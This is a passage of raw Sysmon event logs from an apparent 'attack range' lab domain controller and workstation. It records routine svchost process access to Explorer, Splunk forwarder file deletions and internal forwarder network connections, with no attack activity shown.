10341000x8000000000000000298472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.925{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:08.810{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23FE28E91CA8A827C115F6C8364182E7,SHA256=40916656DBAD982C60D298B8E11FFF0D94643F365D9BCB781A3D287C1D030154,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:06.650{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51709-false10.0.1.12-8000- 23542300x8000000000000000222324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:08.508{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26D2D03833AD9B27073DAABE61D8E35C,SHA256=BC997374111A167F743DA8BBB724B45893C07E28BED0DFC98B552B9DC8B97EDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:09.893{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33CFC03CF9C405ABF9567C3F8E4CC381,SHA256=C0FD787DF47F4AD3A02C512E9A3BE4E4A5AEDB5CAE6D6977B24E9FBD55E7AF5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:09.523{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E49379677BF3D44E53149854D6B89E4,SHA256=7715AFF2ED05CF5E176AE8710DE54E250170FA45364DA81DA549DB994335D6F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:10.926{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B56A23720F25E366AC78AE625678E475,SHA256=DA5BC17248371515D9CB1ECBC7BEA6F5D5DF1C1EF4D1D678982FB450F04B3347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:10.523{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26DFA0D89CB30A386FDCA77817AC509D,SHA256=10AFF366F50F8FD78954E38BE61B02BFFE0035DB3AC8DEDA2E3352419775E1BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:07.606{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49533-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:11.942{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B62EDAAD29315ABBD8E4212C5D747E39,SHA256=906695947451C65757A82BDE18E8C0E5920BD246040CFF45BD8D340EC4D7FE19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:11.539{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3532469C904F4C97F248131B0AA363C7,SHA256=6774EEA6FFFD96BB38AD47A67D160C892A818B529A4EE94BF70759C28AB5B8F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:12.957{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A90281F31039F1CBE2F95D0927EA349,SHA256=AA4E06B78D0244C2B03DBA37E72A2514BC59C9FDC493877C09F9F5589E4A0AD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:12.555{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471F1CA006A376BC483EE85926A4DF79,SHA256=61A234759268CE261DF20F723A99A6C60F517D5B094A33B57F16866BC6DA6A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:13.972{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF3288D0A533C765AE387973184E312D,SHA256=43704B93343E333739E69969B90D49B6260178B81173B5A06674B9599FBD8B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:13.555{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1FDA38102EE45840D1FDF29E7B6099A,SHA256=9181A19C37556E21E42EB72070B7E779DD51FD06E6760C3B11B0F736746B7A9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:14.974{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D5F69022BE85871682061A8A2C80425,SHA256=74F43742829DC256A3D1EE1CEDDAE42B4ED1BDFEA9130FFC8141C032721992AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:14.570{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D52210FE8B72DCF8285CCEBE5CF1028,SHA256=524ABC045213BA2C8F7FB936DAC4A8CEC2B215EFB80FF02AAFD2DD5B0235CC9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:15.975{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0621E4DACE1E1EB6D08FB572DED2894,SHA256=DD0C8A6211296BEAC7281ED6EBA10AE17B799AD2E151C455B733E82017957B0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:15.586{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C4D20FBD73DF89E41B03737D0BAB3F9,SHA256=8CFFB78348DEC755B5DED7C4D351930D0D51053A01D14AD01981CD72EB61C120,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:12.619{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51710-false10.0.1.12-8000- 23542300x8000000000000000298502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:16.976{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF7624FDBC29617DC9C2CBE69938693F,SHA256=E58E2505CEB1F2D6F7ADDB732CED2BFCC98BE09466F7432990C6025C6C887FA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:16.617{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 